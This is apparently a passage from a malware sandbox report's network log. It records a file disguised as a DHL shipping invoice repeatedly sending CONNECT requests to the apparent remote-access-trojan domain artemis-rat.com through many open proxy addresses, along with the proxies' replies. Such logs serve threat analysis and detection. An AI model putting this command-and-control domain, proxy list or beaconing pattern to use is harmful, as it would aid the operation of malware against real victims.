                            595192.168.2.45186393.171.220.22988886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.265886068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            596192.168.2.451045128.199.221.91216056484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.271050930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.359211922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.453402996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.562742949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:25.562860966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:37.564929962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:49.564927101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            597192.168.2.45126872.210.252.13741456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.272775888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            598192.168.2.451881220.248.70.23790026484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.273132086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.564421892 CET311INHTTP/1.1 400 Bad Request
                            Server: nginx
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html
                            Content-Length: 166
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            599192.168.2.451980198.74.51.7988886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.276051998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            600192.168.2.45197798.162.25.4316546484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.278220892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            601192.168.2.451286147.124.212.31553616484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.279218912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            602192.168.2.45198298.162.25.2341456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.281140089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            603192.168.2.451887218.252.244.126806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.282547951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            604192.168.2.45198672.206.181.12341456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.288527012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            605192.168.2.45198772.217.158.20241456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.289936066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            606192.168.2.451457117.160.250.16399996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.293987036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.126364946 CET221INHTTP/1.1 403 Access Denied
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Connection: close
                            Cache-Control: no-store
                            Content-Type: text/html
                            Content-Language: en
                            Content-Length: 43
                            Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                            Data Ascii: You are not allowed to access the document.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            607192.168.2.45113490.188.250.16806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.296650887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            608192.168.2.45198923.137.248.197806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.297451973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            609192.168.2.451975185.38.111.180806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.301508904 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:01.488850117 CET75INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Length: 0
                            Mar 12, 2024 08:37:01.707701921 CET103INHTTP/1.1 400 Bad Request
                            Content-Type: text/plain; charset=utf-8
                            Connection: close
                            Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                            Data Ascii: 400 Bad Request


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            610192.168.2.451942211.222.252.18781936484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.303216934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            611192.168.2.45208647.116.218.04436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.306183100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            612192.168.2.45208847.116.218.04436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.308458090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            613192.168.2.45197294.45.74.6080806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.308506966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            614192.168.2.45209547.116.218.04436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.310295105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            615192.168.2.45209947.116.218.04436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.311763048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            616192.168.2.450900142.54.228.19341456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.352675915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            617192.168.2.451153146.190.101.22231286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.353907108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.343744040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.453413010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.547002077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:25.640594006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:37.640450954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:49.656075001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:13.656156063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:01.718586922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            618192.168.2.451926123.126.158.50806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.358812094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            619192.168.2.452003147.75.34.85100116484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.362097979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.525944948 CET65INHTTP/1.1 200 Connection Established
                            Proxy-Agent: Zscaler/6.3


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            620192.168.2.452018172.67.181.103806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.362308025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.450059891 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            621192.168.2.451147210.5.10.87532816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.364187956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.359335899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.247087002 CET202INHTTP/1.0 404 Not Found
                            Content-Length: 715
                            Content-Type: text/html
                            Date: Sun, 10 Mar 2024 22:01:14 GMT
                            Expires: Sun, 10 Mar 2024 22:01:14 GMT
                            Server: Mikrotik HttpProxy
                            Proxy-Connection: close


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            622192.168.2.452037104.17.9.114806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.364188910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.451473951 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            623192.168.2.452047104.24.220.52806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.364742041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.452260017 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            624192.168.2.452057172.64.80.55806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.366213083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.454011917 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            625192.168.2.451858103.199.155.1869696484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.366413116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            626192.168.2.451953103.23.101.9741456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.366796970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            627192.168.2.452063185.162.228.170806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.366806984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.454418898 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
